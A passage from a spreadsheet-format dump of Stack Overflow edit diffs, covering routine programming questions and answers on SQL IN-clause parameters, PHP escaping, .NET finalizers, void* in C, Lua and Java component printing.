 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Thanks, Fred&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to create a rectangle bubble with &lt;span class="diff-add"&gt;rounded corners with text&lt;/span&gt; inside, like a cartoon&lt;span class="diff-add"&gt; speech&lt;/span&gt; bubble. I need the bubble to expand horizontally and vertically depending on the size of the text it &lt;span class="diff-add"&gt;contain. I would like&lt;/span&gt; the &lt;span class="diff-add"&gt;speech&lt;/span&gt; arrow&lt;span class="diff-add"&gt; and the radius of the rounded corners to remain constant&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I could simply use a path to create my bubble, but I can't resize the bubble and keep the corners radius and arrow constant... it's the whole path that will be resized.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd appreciate that some one could point me in the right direction.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img258.imageshack.us/img258/5088/bubblesstackoverflowbh4.gif" rel="nofollow noreferrer"&gt;alt text http://img258.imageshack.us/img258/5088/bubblesstackoverflowbh4.gif&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Frederic</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Closed&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; as duplicate of &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/303149/parameterized-queries-with-like-and-in-conditions"&gt;&lt;span class="diff-delete"&gt;Parameterized Queries with LIKE and IN conditions&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; How do I parameterize a query containing an IN clause with a variable number of arguments, like this one?&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; Tags _x000D_
&lt;span class="hljs-keyword"&gt;where&lt;/span&gt; Name &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; (&lt;span class="hljs-string"&gt;'ruby'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'rails'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'scruffy'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'rubyonrails'&lt;/span&gt;)_x000D_
&lt;span class="hljs-keyword"&gt;order&lt;/span&gt; &lt;span class="hljs-keyword"&gt;by&lt;/span&gt; Count &lt;span class="hljs-keyword"&gt;desc&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this query, the number of arguments could be anywhere from 1 to 5.&lt;/p&gt; _x000D_
 &lt;p&gt; I would prefer not to use a dedicated stored procedure for this (or XML), but if there is some fancy SQL Server 2008 specific way of doing it elegantly, I am open to that.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I parameterize a query containing an IN clause with a variable number of arguments, like this one?&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; Tags _x000D_
&lt;span class="hljs-keyword"&gt;where&lt;/span&gt; Name &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; (&lt;span class="hljs-string"&gt;'ruby'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'rails'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'scruffy'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'rubyonrails'&lt;/span&gt;)_x000D_
&lt;span class="hljs-keyword"&gt;order&lt;/span&gt; &lt;span class="hljs-keyword"&gt;by&lt;/span&gt; Count &lt;span class="hljs-keyword"&gt;desc&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this query, the number of arguments could be anywhere from 1 to 5.&lt;/p&gt; _x000D_
 &lt;p&gt; I would prefer not to use a dedicated stored procedure for this (or XML), but if there is some fancy SQL Server 2008 specific way of doing it elegantly, I am open to that.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Try this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php    _x000D_
$d = array();_x000D_
for($i = 0; $i &amp;lt; 30; $i++) _x000D_
    $d[] = date(&lt;span class="diff-delete"&gt;'d'&lt;/span&gt;, strtotime(&lt;span class="diff-delete"&gt;"&lt;/span&gt;- $i &lt;span class="diff-delete"&gt;days"&lt;/span&gt;));_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Try this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php    _x000D_
$d = array();_x000D_
for($i = 0; $i &amp;lt; 30; $i++) _x000D_
    $d[] = date(&lt;span class="diff-add"&gt;"d"&lt;/span&gt;, strtotime(&lt;span class="diff-add"&gt;'&lt;/span&gt;-&lt;span class="diff-add"&gt;'.&lt;/span&gt; $i &lt;span class="diff-add"&gt;.' days'&lt;/span&gt;));_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ThoKra</t>
  </si>
  <si>
    <t>Achshar</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a quick-and-dirty technique I have used:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;SELECT&lt;/span&gt; * &lt;span class="diff-delete"&gt;_x000D_
FROM&lt;/span&gt; Tags_x000D_
&lt;span class="diff-delete"&gt;WHERE&lt;/span&gt; '|ruby|rails|scruffy|rubyonrails|'_x000D_
&lt;span class="diff-delete"&gt;   LIKE&lt;/span&gt; '%|' + Name + '|%'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So here's the C# code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;string[] tags = new string[] { "ruby", "rails", "scruffy", "rubyonrails" };_x000D_
const string cmdText = "select * from tags where '|' + @tags + '|' like '%|' + Name + '|%'";_x000D_
_x000D_
using (SqlCommand cmd = new SqlCommand(cmdText)) {_x000D_
   cmd.Parameters.AddWithValue("@tags", string.Join("|", tags);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Two caveats:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; The performance is terrible. &lt;code&gt;like "%...%"&lt;/code&gt; queries are not indexed.&lt;/li&gt; _x000D_
  &lt;li&gt; Make sure you don't have any &lt;code&gt;|&lt;/code&gt;, blank, or null tags or this won't work&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; There are other ways to accomplish this that some people may consider cleaner, so please keep reading.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a quick-and-dirty technique I have used:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;select&lt;/span&gt; * &lt;span class="diff-add"&gt;from&lt;/span&gt; Tags_x000D_
&lt;span class="diff-add"&gt;where&lt;/span&gt; '|ruby|rails|scruffy|rubyonrails|'_x000D_
&lt;span class="diff-add"&gt;like&lt;/span&gt; '%|' + Name + '|%'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So here's the C# code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;string[] tags = new string[] { "ruby", "rails", "scruffy", "rubyonrails" };_x000D_
const string cmdText = "select * from tags where '|' + @tags + '|' like '%|' + Name + '|%'";_x000D_
_x000D_
using (SqlCommand cmd = new SqlCommand(cmdText)) {_x000D_
   cmd.Parameters.AddWithValue("@tags", string.Join("|", tags);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Two caveats:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; The performance is terrible. &lt;code&gt;like "%...%"&lt;/code&gt; queries are not indexed.&lt;/li&gt; _x000D_
  &lt;li&gt; Make sure you don't have any &lt;code&gt;|&lt;/code&gt;, blank, or null tags or this won't work&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; There are other ways to accomplish this that some people may consider cleaner, so please keep reading.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>SqlZim</t>
  </si>
  <si>
    <t>shA.t</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A finalizer (aka destructor) is part of garbage collection (GC) - it is indeterminate when (or even if) this happens, as GC mainly happens as a result of memory pressure (i.e. need more space). Finalizers are only used for cleaning up &lt;em&gt;unmanaged&lt;/em&gt; resources, since managed resources will have their own collection/disposal&lt;span class="diff-delete"&gt; and so may have already been collected/disposed when the finalizer runs&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Hence &lt;code&gt;IDisposable&lt;/code&gt; is used to &lt;em&gt;deterministically&lt;/em&gt; clean up objects, i.e. now. It doesn't collect the object's memory (that still belongs to GC) - but is used for example to close files, database connections, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; There are lots of previous topics on this:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/188473/how-do-you-manage-deterministic-finalization-in-c"&gt;deterministic finalization&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/245856/when-should-i-dispose-my-objects-in-net"&gt;disposing objects&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/212198/what-is-the-c-using-block-and-why-should-i-use-it"&gt;using block&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/117135/resources-that-have-to-be-manually-cleaned-up-in-c"&gt;resources&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Finally, note that it is not uncommon for an &lt;code&gt;IDisposable&lt;/code&gt; object to also have a finalizer; in this case, &lt;code&gt;Dispose()&lt;/code&gt; usually calls &lt;code&gt;GC.SuppressFinalize(this)&lt;/code&gt;, meaning that GC doesn't run the finalizer - it simply throws the memory away (much cheaper). The finalizer still runs if you forget to &lt;code&gt;Dispose()&lt;/code&gt; the object.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A finalizer (aka destructor) is part of garbage collection (GC) - it is indeterminate when (or even if) this happens, as GC mainly happens as a result of memory pressure (i.e. need more space). Finalizers are&lt;span class="diff-add"&gt; usually&lt;/span&gt; only used for cleaning up &lt;em&gt;unmanaged&lt;/em&gt; resources, since managed resources will have their own collection/disposal.&lt;/p&gt; _x000D_
 &lt;p&gt; Hence &lt;code&gt;IDisposable&lt;/code&gt; is used to &lt;em&gt;deterministically&lt;/em&gt; clean up objects, i.e. now. It doesn't collect the object's memory (that still belongs to GC) - but is used for example to close files, database connections, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; There are lots of previous topics on this:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/188473/how-do-you-manage-deterministic-finalization-in-c"&gt;deterministic finalization&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/245856/when-should-i-dispose-my-objects-in-net"&gt;disposing objects&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/212198/what-is-the-c-using-block-and-why-should-i-use-it"&gt;using block&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/117135/resources-that-have-to-be-manually-cleaned-up-in-c"&gt;resources&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Finally, note that it is not uncommon for an &lt;code&gt;IDisposable&lt;/code&gt; object to also have a finalizer; in this case, &lt;code&gt;Dispose()&lt;/code&gt; usually calls &lt;code&gt;GC.SuppressFinalize(this)&lt;/code&gt;, meaning that GC doesn't run the finalizer - it simply throws the memory away (much cheaper). The finalizer still runs if you forget to &lt;code&gt;Dispose()&lt;/code&gt; the object.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I run all my integers through a &lt;code&gt;(int)Integer&lt;/code&gt; to make them safe to use in my query strings.&lt;/p&gt; _x000D_
 &lt;p&gt; I also run my strings through this function code&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;if(!get_magic_quotes_gpc()) {_x000D_
    $string = mysql_real_escape_string($string);_x000D_
}_x000D_
        _x000D_
        _x000D_
$pattern = array("\\'", "\\\"", "\\\\", "\\0");_x000D_
$replace = array("", "", "", "");_x000D_
if(preg_match("/[\\\\'\"\\0]/", str_replace($pattern, $replace, $string)))&lt;span class="diff-delete"&gt; {_x000D_
   &lt;/span&gt; $string = addslashes($string);&lt;span class="diff-delete"&gt;_x000D_
}&lt;/span&gt;_x000D_
        _x000D_
    _x000D_
$cleanedString = str_replace('%','',$string);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I obviously return the $cleanedString variable. Now I replace the % character because it is a wildcard to mySQL and it could potentially slow down my queries (or make them return incorrect data) if the user inserted them. Are there any other special characters for mySQL I should be concerned about? I got it from a website when I was first starting out and (if I remember correctly) it said you had to use this search/replace in addition to the escape string. It looks like it's trying to remove any previously escaped injection characters&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; On a second note, is there anything wrong or redundant about my search and replace after the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;mysql_real_escape_string&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I run all my integers through a &lt;code&gt;(int)Integer&lt;/code&gt; to make them safe to use in my query strings.&lt;/p&gt; _x000D_
 &lt;p&gt; I also run my strings through this function code&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;if(!get_magic_quotes_gpc()) {_x000D_
&lt;span class="diff-add"&gt;       &lt;/span&gt;    $string = mysql_real_escape_string($string);_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;}_x000D_
        _x000D_
        _x000D_
&lt;span class="diff-add"&gt;         &lt;/span&gt;$pattern = array("\\'", "\\\"", "\\\\", "\\0");_x000D_
&lt;span class="diff-add"&gt;         &lt;/span&gt;$replace = array("", "", "", "");_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;if(preg_match("/[\\\\'\"\\0]/", str_replace($pattern, $replace, $string))) $string = addslashes($string);&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
        _x000D_
    _x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;$cleanedString = str_replace('%','',$string);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I obviously return the $cleanedString variable. Now I replace the % character because it is a wildcard to mySQL and it could potentially slow down my queries (or make them return incorrect data) if the user inserted them. Are there any other special characters for mySQL I should be concerned about?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; On a second note, is there anything wrong or redundant about my search and replace after the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;mysql_real_escape_string&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;?&lt;/span&gt; I got it from a website when I was first starting out and (if I remember correctly) it said you had to use this search/replace in addition to the escape string. It looks like it's trying to remove any previously escaped injection characters?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>alex</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Forty Foot Pole Test&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Afraid of getting too close to the class they are trying to test, these tests act at a distance, separated by countless layers of abstraction and thousands of lines of code from the logic they are checking. As such they are extremely brittle, and susceptible to all sorts of side-effects that happen on the epic journey to and from the class of interest.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Don't touch it; it might break&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; -- Unknown Developer&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Forty Foot Pole Test&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Afraid of getting too close to the class they are trying to test, these tests act at a distance, separated by countless layers of abstraction and thousands of lines of code from the logic they are checking. As such they are extremely brittle, and susceptible to all sorts of side-effects that happen on the epic journey to and from the class of interest.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;There&lt;/span&gt; are many drawbacks using void* in C&lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt;(memory related, type related,&lt;span class="diff-delete"&gt; efficiency&lt;/span&gt; wise ...). &lt;span class="diff-delete"&gt;In spite&lt;/span&gt; of them&lt;span class="diff-delete"&gt;,&lt;/span&gt; we use them a lot for the flexibility they provide.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;List&lt;/span&gt; the disadvantages/drawbacks using void* (and &lt;span class="diff-delete"&gt;preferred&lt;/span&gt; solution in C - if possible).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; &lt;span class="diff-delete"&gt;Please&lt;/span&gt; go thru the &lt;span class="diff-delete"&gt;following&lt;/span&gt; link: &lt;a href="http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/" rel="nofollow noreferrer"&gt;http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;there&lt;/span&gt; are many drawbacks using void* in C(memory related, type related,&lt;span class="diff-add"&gt;efficiency&lt;/span&gt; wise ...). &lt;span class="diff-add"&gt;inspite&lt;/span&gt; of them we use them a lot for the flexibility they provide.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;list&lt;/span&gt; the disadvantages/drawbacks using void* (and &lt;span class="diff-add"&gt;preferd&lt;/span&gt; solution in C - if possible).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; &lt;span class="diff-add"&gt;please&lt;/span&gt; go thru the &lt;span class="diff-add"&gt;follwoing&lt;/span&gt; link: &lt;a href="http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/" rel="nofollow noreferrer"&gt;http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>FL4SOF</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like Parrot, the Lua VM is register-based; here's a link to a PDF by the language's creator:&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like Parrot, the Lua VM is register-based; here's a link to a PDF by the language's creator:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.inf.puc-rio.br/%7Eroberto/talks/lua-ll3.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.inf.puc-rio.br/~roberto/talks/lua-ll3.pdf&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dexygen</t>
  </si>
  <si>
    <t>Motti</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I send keyboard input messages to either the currently selected window or the previously selected window?&lt;/p&gt; _x000D_
 &lt;p&gt; I have a program which I use to type some characters which are not present on my keyboard and I would like it if I could just send the input directly rather than me having to copy and paste all the time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I send keyboard input messages to either the currently selected window or the previously selected window?&lt;/p&gt; _x000D_
 &lt;p&gt; I have a program which I use to type some characters which are not present on my keyboard and I would like it if I could just send the input directly rather than me having to copy and paste all the time.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; The application of this is typing the German Umlauts. I'm an American and I work in Germany. I'm working on an American keyboard and from time to time I have to type in the umlauts / the euro symbol / the sharp S. Currently I have a simple WinForms application with a textfield and some buttons with the extra characters on it. I type into the textfield and I can press the buttons to append text to the textfield. I then copy the text and paste it where ever. What would be nice though if I could just just hit one of the buttons and it would send the text where ever I'm typing / was typing. The current program works fairly well but I could make it better.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>smack0007</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can all .NET exception objects be serialized?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Summary of responses:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; They should be, but historically, there have been exceptions.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Objects in the Data dictionary may prevent the exception from serializing.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can all .NET exception objects be serialized?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>yoozer8</t>
  </si>
  <si>
    <t>Esteban Araya</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;package dol.lpc.lib.gui;_x000D_
_x000D_
import java.awt.*;_x000D_
import java.awt.print.*;_x000D_
import javax.swing.*;_x000D_
_x000D_
/**_x000D_
 * Generic component printer.  This object allows any AWT or Swing component  (or DCT system)_x000D_
 * to be printed by performing it pre and post print responsibilities._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * When printing components, the role of the print method is nothing more than to scale the Graphics, turn off double_x000D_
 * buffering, and call paint.  There is no particular reason to put that print method in the component being printed.  A_x000D_
 * better approach is to build a generic printComponent method to which you simply pass the component you want printed._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * With Swing, almost all components have double buffering turned on by default. In general, this is a great benefit,_x000D_
 * making for convenient and efficient painting. However, in the specific case of printing, it can is a huge problem._x000D_
 * First, since printing components relies on scaling the coordinate system and then simply calling the component's_x000D_
 * paint method, if double buffering is enabled printing amounts to little more than scaling up the buffer (off-screen_x000D_
 * image) which results in ugly low-resolution printing like you already had available. Secondly, sending these huge_x000D_
 * buffers to the printer results in huge print spooler files which take a very long time to print. Consequently this_x000D_
 * object globally turns off double buffering before printing and turns it back on afterwards._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * Threading Design : [x] Single Threaded  [ ] Threadsafe  [ ] Immutable  [ ] Isolated_x000D_
 */_x000D_
_x000D_
public class ComponentPrinter&lt;span class="diff-delete"&gt; &lt;/span&gt;extends Object&lt;span class="diff-delete"&gt; &lt;/span&gt;implements Printable&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   // *****************************************************************************_x000D_
    &lt;span class="diff-delete"&gt;//&lt;/span&gt; &lt;span class="diff-delete"&gt;INSTANCE&lt;/span&gt; &lt;span class="diff-delete"&gt;PROPERTIES_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;//&lt;/span&gt; &lt;span class="diff-delete"&gt;*****************************************************************************_x000D_
_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;private&lt;/span&gt; &lt;span class="diff-delete"&gt;Component&lt;/span&gt; component; // the component to print_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// INSTANCE CREATE/DELETE_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;public ComponentPrinter(Component com) {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    component=com;_x000D_
    }_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// INSTANCE METHODS_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;public void print() throws PrinterException {_x000D_
        &lt;span class="diff-delete"&gt;PrinterJob&lt;/span&gt; printJob=PrinterJob.getPrinterJob();_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    printJob.setPrintable(this);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    if(printJob.printDialog()) {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        printJob.print();_x000D_
        }_x000D_
    }_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;public int print(Graphics gc, PageFormat pageFormat, int pageIndex) {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    if(pageIndex&amp;gt;0) {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return NO_SUCH_PAGE;_x000D_
        }_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    RepaintManager mgr=RepaintManager.currentManager(component);_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       &lt;span class="diff-delete"&gt;Graphics2D&lt;/span&gt; &lt;span class="diff-delete"&gt;g2d&lt;/span&gt; &lt;span class="diff-delete"&gt;=&lt;/span&gt; (Graphics2D)gc;_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    g2d.translate(pageFormat.getImageableX(),pageFormat.getImageableY());_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    mgr.setDoubleBufferingEnabled(false);  // only for swing components_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    component.paint(g2d);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    mgr.setDoubleBufferingEnabled(true);   // only for swing components_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    return PAGE_EXISTS;_x000D_
    }_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
